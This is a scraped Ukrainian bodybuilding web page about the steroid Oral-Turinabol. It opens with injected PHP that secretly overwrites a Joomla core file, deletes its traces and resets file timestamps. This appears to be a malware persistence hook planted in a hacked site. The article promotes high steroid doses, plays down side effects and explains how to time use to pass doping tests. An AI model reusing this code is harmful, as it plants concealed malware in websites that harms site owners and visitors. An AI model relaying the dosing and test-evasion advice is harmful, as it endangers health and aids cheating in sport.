$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Туринабол. Орал-туринабол | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Туринабол. Орал-туринабол

Туринабол Туринабол оральний
Діюча хімічна речовина: хлордегидрометилтестостерон.
Торговельні назви:   Орал-туринабол 5мг таб: Йенафарм Німеччина.
Орал-туринабол 1мг таб: Йенафарм Німеччина.
Туранабол 10мг таб: Бритиш Драгон, Тайланд.
Орал - Туринабол оральный стероїд, який був розроблений на початку 60- х на фірмі Йенафарм і з'явився на ринку тодішньої ГДР. Поряд зі своїм клінічним застосуванням препарат застосовувався  у ГДР як допінговим засіб. Орал - Туринабол приміняється і сьогодні, як і колись.

Цей стероїд виявляє переважно анаболічний вплив на організм, з відносно невеликим андрогенним. По шкалі в 100%, андрогенний вплив становить 6 %, анаболічний 53% (Для порівняння: дія Діанабола - андрогенне 45%, анаболична дія  десь 90%). Тобто Орал - Туринабол виявляє трохи слабший вплив, ніж  Діанабол. Отже, це не стероїд для блискавичного нарощення сили, ваги й м'язової маси. Результати скоріше - у солідному приросту м'язової маси й сили, якщо приймати препарат кілька тижнів. В атлета не буде при цьому надлишку води у організмі, як при прийманні тестостерону, Діанабола або Анаполона50. Було науково доказано, що ефективність цього препарату сильно залежить від дози.

Досвід показує, що атлети бодібілдингу приймають його  по 40-50мг у день. І багато хто  при цих дозах в захваті розповідають про відмінні результати: нарощення солідної м'язової маси, чітко помітному зростанні сили, і про незначну затримку води в організмі, Побічні ефекти, обумовлені естрогенами, украй рідкі. Не даремно препарат так люблять штангісти й пауэрліфтери, вони знають ціну його властивостям. Нам знайомі два атлети, які приймають у певні фази тренувань 20 таблеток по 5мг щодня й виглядають масивними й мускулистими й при цьому жмуть лежачи понад 240кг, і присідають майже 380. До того ж без додаткового приймання якого-небудь іншого стероїду. На підставі своїх якостей, - це підходящий стероїд для змагань, як для: чоловіків, так і для жінок. Особливо радує препарат при змаганнях з допінг контролем, тому що швидко розкладається в організмі, і продукти його розпаду виводяться з організму із сечею в найкоротший час. Але точно відповісти на запитання, за скільки днів до змагань можна приймати препарат, щоб при допінг- контролі залишитися чистим, важко.

ТУРИНАБОЛ ВІДГУКИЗ достовірних джерел ми все-таки відомо, що атлети, що приймають Орал Туринабол у якості єдиного стероїду, навіть при дозуваннях понад 10 пігулок  в день, припиняють його приймання рівно за 5 днів до тесту, і аналізи й проби дають негативні результати. На користь препарату й цих відомостей говорить і той факт, що назву Орал - Туринабол ніколи ще не з'являлося в списку позитивних уриновых проб. Ми розмовляли з деякими атлетами з великого спорту, їх думка така: достатньо припинити приймання препарату за 7-8 днів до змагань, і все буде добре, якщо, звичайно, препарат приймається без супроводу якого-небудь іншого стероїду. Ці дні перед змаганнями можна підживитися за допомогою Андриола, за умови припинення його приймання за 48 годин до тесту. Уже через 14 днів приймання Орал- Туринабола у дозі від 20м г у день спостерігається деяке пригнічення власного вироблення тестостерону, яке знову нормалізується вже через 5 днів після припинення приймання препарату й навіть згодом ще й підвищується. Цікаво, що це знижене вироблення тестостерону вже через тиждень після припинення приймання Орал Туринабола може підвищуватися до показників, що перевищують рівень тестостерону до його приймання. Цей можливий зворотний ефект неможливо переоцінити розраховуючи на допінг контролі. Відносно швидке відновлення власного вироблення тестостерону очевидно полягає в тому, що Орал- Туринабола. у порівнянні з іншими стероїдами знижує рівень тестостерону на 10-25% від норми, у той час як Діанабол, для прикладу, на 30-40%. Можливі побічні явища залежать, як правило, від дози й диференційованості  по статі. У жінок залежно від схильності до явищ маскулінізації, їх поява можлива в дозах понад 20мг у день і при довгому прийомі препарату. У чоловіків може сильно знизитися власне вироблення тестостерону. Гінекомастія при прийомі Орал Туринабола., судячи з досвіду, проявляються вкрай рідко, а вплив на електролітний і водяний баланс взагалі мало помітна.

Джерело : http://athleteprofessional.com
http://www.primordialperformance.com

 

 
Статті СТЕРОЇДИ Туринабол. Орал-туринабол